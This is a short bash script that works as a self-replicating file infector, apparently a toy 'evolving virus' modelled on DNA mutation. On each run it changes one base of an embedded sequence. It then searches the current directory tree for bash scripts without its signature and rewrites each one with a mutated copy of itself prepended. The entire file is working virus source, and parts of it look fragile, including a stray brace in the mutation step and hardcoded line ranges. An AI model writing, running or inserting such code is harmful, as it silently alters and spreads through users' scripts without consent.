#!/bin/bash

CURRENT_SEQUENCE="AACGACTAGGTCAAATAGAGTGCTTTGATATCGGCATGTCTGGCTTTAGAATTCAGTATAGTGCGCTGATCCGAGTCGAGATAAAAACACCAGTACCCAAAACCAGGCGGGCTCGCCACGTCGGCTAATCCTGGTACATTTTGTAAACAATGTTCAGAAGAAAATTTGTGATAGAAGGACGAGTCACCGCGTACTAATAGCAACAACGATCGGCCGCACCATCCATTGTCGTGGTGACGCTCGGATTACACGGGAAAGGTGCTTGTGTCCCGACAGGCTAGGATATAATCCTGAGGCGTTACCCCAATCGTTCAGCGTGGGATTTGCTACAACTCCTGAGCGCTACATGTACGAAACCATGTTATGTATGCACAAGGCCGACAATAGGACGTAGCCTTGAAGTTAGTACGTAGCGTGGTCGCATAAGTACAGTAGATCCTCCCCGCGCATCCTATTTATTAAGTTAATTCTACAGCAATACGATCATATGCGGATCCGCAGTGGCCGGTAGACACACGTCTACCCCGCTGCTCAATGACCGGGACTAAAGAGGCGAAGATTATGGTGTGTGACCCGTTATGCTCGAGTTCGGTCAGAGCGTCATTGCGAGTAGTCGTTTGCTTTCTCAAACTCCGAGCGATTAAGCGTGACAGCCCCAGGGAACCCACAAAACGTGATCGCAGTCCATCCGATCATACACAGAAAGGAAGGTCCCCATACACCGACGCACCAGTTTACACGCCGTATGCATAAACGAGCCGCACGAACCAGAGAGCTTGAAGTGGACCTCTAGTTCCTCTACAAAGAACAGGTTGCCCTGTCGCGAAGATGCCTTACCTAGATGCAATGACGGACGTATTCCTTTTGCCTCAACGGCTCCTGCTTTCGCTGAAATCCAAGACAGGCAACAGAAACCGCCTTTCGAAAGTGAGTCCTTCGTCTGTGACTAACTGTGCCAAATCGTCTTGCAAACTCCTAATCCAGTTTAACTCACCAAATT"
ANCESTRAL_SEQUENCE="AACGACTAGGTCAAATAGAGTGCTTTGATATCGGCATGTCTGGCTTTAGAATTCAGTATAGTGCGCTGATCCGAGTCGAGATAAAAACACCAGTACCCAAAACCAGGCGGGCTCGCCACGTCGGCTAATCCTGGTACATTTTGTAAACAATGTTCAGAAGAAAATTTGTGATAGAAGGACGAGTCACCGCGTACTAATAGCAACAACGATCGGCCGCACCATCCATTGTCGTGGTGACGCTCGGATTACACGGGAAAGGTGCTTGTGTCCCGACAGGCTAGGATATAATCCTGAGGCGTTACCCCAATCGTTCAGCGTGGGATTTGCTACAACTCCTGAGCGCTACATGTACGAAACCATGTTATGTATGCACAAGGCCGACAATAGGACGTAGCCTTGAAGTTAGTACGTAGCGTGGTCGCATAAGTACAGTAGATCCTCCCCGCGCATCCTATTTATTAAGTTAATTCTACAGCAATACGATCATATGCGGATCCGCAGTGGCCGGTAGACACACGTCTACCCCGCTGCTCAATGACCGGGACTAAAGAGGCGAAGATTATGGTGTGTGACCCGTTATGCTCGAGTTCGGTCAGAGCGTCATTGCGAGTAGTCGTTTGCTTTCTCAAACTCCGAGCGATTAAGCGTGACAGCCCCAGGGAACCCACAAAACGTGATCGCAGTCCATCCGATCATACACAGAAAGGAAGGTCCCCATACACCGACGCACCAGTTTACACGCCGTATGCATAAACGAGCCGCACGAACCAGAGAGCTTGAAGTGGACCTCTAGTTCCTCTACAAAGAACAGGTTGACCTGTCGCGAAGATGCCTTACCTAGATGCAATGACGGACGTATTCCTTTTGCCTCAACGGCTCCTGCTTTCGCTGAAATCCAAGACAGGCAACAGAAACCGCCTTTCGAAAGTGAGTCCTTCGTCTGTGACTAACTGTGCCAAATCGTCTTGCAAACTCCTAATCCAGTTTAACTCACCAAATT"

infectable_files () {
  for i in $(find . -type f)
  do
    interpreter=$(grep "#!" $i | cut -d"!" -f2)
    if [[ $interpreter == "/bin/bash" ]]
    then
      signature=$(grep "CURRENT_SEQUENCE" $i | wc -l)
        if [[ $signature == 0 ]]
        then
          echo $i
        fi
    fi
  done
}

a_one_and_many_zeroes () {
  tot_length=$1
  echo "1"
  for i in $(seq 1 $(($tot_length - 1)));
  do
    echo "0"
  done
}

sequence_mutator () {
  input_sequence=$CURRENT_SEQUENCE
  mutated_site=$(a_one_and_many_zeroes 1000 | shuf | grep -n "1" | cut -d":" -f1)
  new_base=$(echo -e "A\nT\nG\nC" | grep -v ${input_sequence:$(($mutated_site-1)):1}} | shuf | head -n1)
  echo $input_sequence | sed s/./$new_base/$mutated_site
}

CURRENT_SEQUENCE=$(sequence_mutator)

make_mutated_copy () {
  sed -n 1,2p $BASH_SOURCE
  echo "CURRENT_SEQUENCE=\"$(echo $CURRENT_SEQUENCE)\""
  sed -n 4,55p $BASH_SOURCE
}

infector () {
  for i in $(infectable_files);
  do
    mv $i $i.tmp
    make_mutated_copy > $i
    cat $i.tmp >> $i
    rm $i.tmp
  done 
}

infector
